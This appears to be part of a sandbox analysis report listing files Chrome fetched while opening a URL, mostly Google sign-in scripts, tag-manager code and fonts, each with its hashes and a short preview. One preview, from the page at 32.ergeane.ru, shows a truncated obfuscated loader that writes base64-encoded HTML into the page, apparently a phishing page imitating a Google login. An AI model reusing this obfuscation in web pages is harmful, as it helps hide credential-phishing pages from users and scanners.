                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".r4WGQb{position:relative}.Dl08I>:first-child{margin-top:0}.Dl08I>:last-child{margin-bottom:0}.IzwVE{color:#1f1f1f;color:var(--gm3-sys-color-on-surface,#1f1f1f);font-family:\"Google Sans\",roboto,\"Noto Sans Myanmar UI\",arial,sans-serif;font-size:1.25rem;font-weight:400;letter-spacing:0rem;line-height:1.2}.l5PPKe{color:#1f1f1f;color:var(--gm3-sys-color-on-surface,#1f1f1f);font-size:1rem}.l5PPKe .dMNVAe{margin:0;padding:0}.l5PPKe>:first-child{margin-top:0;padding-top:0}.l5PPKe>:last-child{margin-bottom:0;padding-bottom:0}.Dl08I{margin:0;padding:0;position:relative}.Dl08I>.SmR8:only-child{padding-top:1px}.Dl08I>.SmR8:only-child::before{top:0}.Dl08I>.SmR8:not(first-child){padding-bottom:1px}.Dl08I>.SmR8::after{bottom:0}.Dl08I>.SmR8:only-child::before,.Dl08I>.SmR8::after{border-bottom:1px solid #c4c7c5;border-bottom:1px solid var(--gm3-sys-color-outline-variant,#c4c7c5);content:\"\";height:0;left:0;position:absolute;width:100%}.aZvCDf{margin-top:8px;margin-left
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):778343
                                                                                                                                                                                                                                  Entropy (8bit):5.793694490400325
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:87VP8oQ/o753KL28czcEjJ3EzOgzW3cc6rrXCuM5vlS0raL6MBci1Ll2u6DzIovM:Z/o75SFcp3y0cbziA6ofx6VcS8UDRyD
                                                                                                                                                                                                                                  MD5:E5765455EC3F7EFA74922F1F3B45A408
                                                                                                                                                                                                                                  SHA1:A67AFB2C49194800CB17C793FCCC137090F1AD62
                                                                                                                                                                                                                                  SHA-256:C2D78285B6C1970DD55CA9BEFE14010D26BC6D1CE7AB652C1ED07D2246A24724
                                                                                                                                                                                                                                  SHA-512:1A69EEDBADCAB7282E5684E148714A86D737D3E868C44681B32F8CDFBE7B50C5C7DD690FEAF421E5344670AF3798934192133243ED11906195FFE0C6BA56528D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlGWQEnQMJuLS_gM0oLM8kfMXnjdag/m=_b,_tp"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x24cc1989, 0x1be1, 0x1a70ff1, 0x91406f4, 0x3210, 0x0, 0x36000000, 0x32000000, 0x61, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Qa,Ua,gaa,iaa,jb,saa,zaa,Ab,Laa,Naa,Qaa,Mb,Raa,Sb,Ub,Vb,Saa,Taa,Xb,Uaa,Vaa,Waa,ac,aba,cba,ic,jc,kc,gba,iba,jba,nba,pba,rba,sba,wba,zba,tba,yba,xba,vba,uba,Aba,Bba,Cba,Jba,Mba,Oba,Pba,Lba,Rba,Oc,Tba,Zba,$ba,aca,bca,cca,dca,Xba,Yba,fca,hca,kca,lca,mca,nca,oca,rca,tca,sca,vca,Ed,Dd,xc
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):278417
                                                                                                                                                                                                                                  Entropy (8bit):5.579850674098672
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Np8YnsmQ88yZ1HcRCriua0Mf3/9rf1uT+bQx5:f0m98y7Hc8ci5
                                                                                                                                                                                                                                  MD5:831FB937E064297F6E8308CB15C0FD0F
                                                                                                                                                                                                                                  SHA1:D0B0C0AFAFF26DCFADD6B5334965CBB7FF7F8816
                                                                                                                                                                                                                                  SHA-256:B2C57BEA01CAC8315ADBF83AD57CCFA77198426C9DA96CCEBBDDDE0CA89CE831
                                                                                                                                                                                                                                  SHA-512:FAA75CE3D52187AD58F71EAC4C1CFFE6CD3A2161D2268BC911FA692EA88380C7238155F274B4B6E90EF1C7698320E2CF88AB1E663351964FB2773B09C3CAAD29
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/gtag/js?id=G-H30R9PNQFN
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":111},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_fir
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2310)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):215648
                                                                                                                                                                                                                                  Entropy (8bit):5.535696194644152
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:LtFitgcnsmIjF+D0KzmYasxzuZ1IwPcRCrhaPhka0Mf3/XVtVmbVM3:JYnsmQ5Z1HcRCrva0Mf3/XVf
                                                                                                                                                                                                                                  MD5:25945BEA50FCF65A95F38DC9D3BC8E9A
                                                                                                                                                                                                                                  SHA1:1C0DED5A4804DBF9373676EE44C9A6E201F4645F
                                                                                                                                                                                                                                  SHA-256:1865B19F74BBB17DED613F96CEB943BAF0DA99C60B9346B17E74D69FBE964239
                                                                                                                                                                                                                                  SHA-512:4908D5976FE009017486A73417C50AEB86CDD8F77408A595C9A64DFCB36509837E3DF93A52A42F837A1E6EAC93105C638432BAA4EE43E89260660EC848B6FFE1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/gtag/js?id=UA-175894890-5&l=dataLayer&cx=c&gtm=45je4cc1v871812832za200
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{d
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):5046
                                                                                                                                                                                                                                  Entropy (8bit):5.312492340620023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:oz+ZgPGU74TnqKgb8nx0HGJzLmMIjh1xXnau7OTXuDOc7JIB3KmmRue8w:jEGU7RD8nx08dknaKAXWOc76B3K7RHJ
                                                                                                                                                                                                                                  MD5:14CB3DBC7636F9382A486C95D964EDE5
                                                                                                                                                                                                                                  SHA1:DB7304683E15C83716704EBE4AA656E2167AFCF1
                                                                                                                                                                                                                                  SHA-256:3223C5790D6AB8A2D89E35777FD90C38FEC70F8083590C4E406354DF5279C8E6
                                                                                                                                                                                                                                  SHA-512:FD96A19F4519AB0F8F3900FB2DEB9F5BB3DAD9AA06EE19504EF4FEC5570D2249781C5382914B389D0A5BAFDC2F271460CF7381F5F3A92E5FF8241A4351AC35F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/ck=boq-identity.AccountsSignInUi.LKDR6mlAzks.L.B1.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,O6y8ed,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGArwG7Kxzg65_VsZCF0RXYsD32Uw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.iOa=_.z("wg1P6b",[_.yB,_.Eo,_.Lo]);._.k("wg1P6b");.var Y9a;Y9a=_.Rh(["aria-"]);._.MI=function(a){_.W.call(this,a.La);this.Ma=this.Ba=this.aa=this.viewportElement=this.Pa=null;this.Yc=a.Fa.Hf;this.eb=a.Fa.focus;this.Lc=a.Fa.Lc;this.fa=this.Lj();a=-1*parseInt(_.xp(this.Lj().el(),"marginTop")||"0",10);var b=parseInt(_.xp(this.Lj().el(),"marginBottom")||"0",10);this.Wa={top:a,right:0,bottom:b,left:0};a=_.rf(this.getData("isMenuDynamic"),!1);b=_.rf(this.getData("isMenuHoisted"),!1);this.Ea=a?1:b?2:0;this.oa=!1;this.Da=1;this.Ea!==1&&(this.aa=this.Sa("U0exHf").children().Sc(0),this.hj(Z9a(this,.this.aa.el())));_.KF(this.Aa())&&(a=this.Aa().el(),b=this.Ne.bind(this),a.__soy_skip_handler=b)};_.K(_.MI,_.W);_.MI.Ca=function(){return{Fa:{Hf:_.zF,focus:_.oF,Lc:_.Uu}}};_.MI.prototype.iA=function(a){var b=a.source;this.Pa=b;var c;((c=a.data)==null?0:c.mB)?(a=a.data.mB,this.Da=a==="MOUSE"
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47692
                                                                                                                                                                                                                                  Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (65381), with CRLF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):444018
                                                                                                                                                                                                                                  Entropy (8bit):3.1222016378985797
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:WHktYmG/kw9Eaq1M8oHVO5V9/rpuuEZrktYmG/kw9Eaq1M8oHVO5V9/rrlrQlr5:WHIYR/kw9E28XWIYR/kw9E28XVqT
                                                                                                                                                                                                                                  MD5:62BF58968E04D28258DE1BD437F31041
                                                                                                                                                                                                                                  SHA1:D90D6407A32E71FAEF1F1BC33B677EAFA13E8EDA
                                                                                                                                                                                                                                  SHA-256:E43E553BC6932D06BDA5E7B0DC36072114ABBBA05247B64939B55D7944440BEE
                                                                                                                                                                                                                                  SHA-512:93A7DB21B6C0BDF17273CDFCCA3C388DBF6ED0F9E71EA1AD5D02FB319BBDF46EA57484BB9B73B53EF3332ADB97C365A3A16ED8365E58C8234B545E37BE18A5D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://32.ergeane.ru/yNriUGk0/
                                                                                                                                                                                                                                  Preview:<script>../* Success is the sum of small efforts, repeated day in and day out. */..if(atob("aHR0cHM6Ly8zMi5lcmdlYW5lLnJ1L3lOcmlVR2swLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQ
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4245)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):121769
                                                                                                                                                                                                                                  Entropy (8bit):5.4739773711708555
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:OYIcfKtW4VB4DUhcC8vnhKtntTCnXAmhdozsCb0YJr35ecMNiycRAD/lsJTD5qzR:dIyKGRKR6Q2XXYJrJTD5qWT88I
                                                                                                                                                                                                                                  MD5:A30AD4B824EABD49827717DA4DD32163
                                                                                                                                                                                                                                  SHA1:BE003CDBFD22A27CF8C7B5CD12267E1DDAC23120
                                                                                                                                                                                                                                  SHA-256:4BB8D199FC83D95CF64D3ECE1F6A53F27535B0F335471ED675C03B729A7BBF86
                                                                                                                                                                                                                                  SHA-512:A9A4A1C8E94C875E2E7BA5A9BE929B59568127F21ABB921EF2721BD84E6329EE50D7B2B19AA7394F961926B64627A0B3ED4044EDDAA93E4A77F6E8A26A185E12
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},t=ca(this),v=function(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.v("Symbol",function(a){if(a)return a;var b=function(g,f){this.$jscomp$symbol$id_=g;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.random
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):178482
                                                                                                                                                                                                                                  Entropy (8bit):5.547385355215203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4fxWlQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQP:t0PuJQ+ApsOOFZNnvOxWlqOQMmsWrBQa
                                                                                                                                                                                                                                  MD5:A93B4B4BB508ADCE7844C065F46F3923
                                                                                                                                                                                                                                  SHA1:ADA20C6D32F062612471F04A30EFBA5B2D0D2ECF
                                                                                                                                                                                                                                  SHA-256:B6DCDE100699EF70477BEB30B92DE7E70155285C740892678D7261622AC1130F
                                                                                                                                                                                                                                  SHA-512:386C0B752CB7D7D5D44CDD7DCFE89B113B899C8CF8C832B94EA8F83292ADC8615718DF421685BB7084E39FF4F721F7264BF8012CD84D4DF7502BE2795F94C9EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15996
                                                                                                                                                                                                                                  Entropy (8bit):7.989012096227512
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:nH4UArsQ/nHYjtuHgovTC+H+b23+kMw/KjK0TQ59u98pgQXk:nYZQjtuHgYGbrMyjDiJXk
                                                                                                                                                                                                                                  MD5:CC536892EABDE0EAEB81493BDA8E189A
                                                                                                                                                                                                                                  SHA1:15C0180AD7BDF9D0F963747447BC9446FC42D2DC
                                                                                                                                                                                                                                  SHA-256:97399A2914C593DA2895D9729AA0170A1956E91EE54CF7550696691949558A37
                                                                                                                                                                                                                                  SHA-512:94F605C4C4FE76EBDB2D5428C6BA69F83B75C65B6932251C0C3E90F92CC1F421FD9F15E81D5985693DC564B8644D90A26DA3E9C63976CF5862ED54D5ED0C4320
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                  Preview:wOF2......>|..........>...........................<..:..:.`..:.....p..~.....6.$..(. ..>..N.....5xn.u..b.....c..<..Rw.H..q.(.....9A...^.=h.%J...4.\.\.[....[....h.j..AP.....a..]N.o....6.a..uO..R.|o...wO..t....s....^F...Oy....IN^..X...9sg...(;..L.....5.s~...?....%.0.f....b.. ..;.. "k+.v`.....1kq.\mqLp.]|..Z\..O......=.......h..,u.................y.h.o.Z..%.....g#..B......V...3.r....J..>g.-rU?+.3A.....C...... .21..f...Z.......P..o..g\.b... v...6..0...b.....?..-WL...Z2...1..Q./....... ..C..G.^r....O......io;.o..4.<....7.Pm..!.Nu.=..Oc............e.w.g.....,...c...0V.P...R.){..u...>*.fi..S.w.G...-..... $.8......w..hp...T@..Go....).......;.....B.)..p.\.?.-KC.S.5..pX9...'.!.-....R.Sg.>x.o.yP......S....a...m<.+".t%..3x.?3M;....k.....I&I.3g.26...p...}~....X.x..G.<)..k..U....AZ..A@....Cu..Tv{...|v.04H.$Xc..E.)<...!........^..~.7P.u...xH..rX..8O....y.k(...0.p 0.%.U...*Z...%...|LlUJ.]L_...9..AX.$E.$.sa.(v8L!...rc.-....I..W..........^U...@.....3P............M..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1203)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):8868
                                                                                                                                                                                                                                  Entropy (8bit):5.130440294070798
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5H4HcHGr9uIHROschHoqPHyHRuHq/Hp+8HObKuHPHk:6rr+cf
                                                                                                                                                                                                                                  MD5:D0A7B8CC43AA9D9BC37980573186F668
                                                                                                                                                                                                                                  SHA1:67262D9435233DD70B6713ABE6DAC956ADFAE617
                                                                                                                                                                                                                                  SHA-256:F94934A2AB404905A25CAF02219F22337610B659D73A72C82EE8287D698BFD0B
                                                                                                                                                                                                                                  SHA-512:5FE3D2316D6661BF22D831263E0232F8AACCA2042D53255C3AC15E3C652EEEC60C8E29D6EA53FD587A41092248067E69786D42147151599CEC865E6C0094FECE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.googleapis.com/css2?family=Noto+Color+Emoji&display=swap
